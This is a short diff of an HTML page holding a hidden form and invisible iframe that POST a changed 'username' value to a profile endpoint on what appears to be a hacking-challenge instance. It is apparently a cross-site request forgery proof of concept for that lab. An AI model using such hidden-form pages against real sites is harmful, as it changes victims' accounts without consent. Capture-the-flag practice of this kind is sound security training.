--- a/index.html
+++ b/index.html
@@ -5,7 +5,7 @@
   <!-- Thay domain nếu instance của bạn khác -->
   <form action="https://hackingchallenge.spsglobal.com/profile"
         method="POST" target="hidden">
-    <input type="hidden" name="username" value="hchai1506">
+    <input type="hidden" name="username" value="hacking">
   </form>
   <iframe name="hidden" style="display:none"></iframe>
 </body>
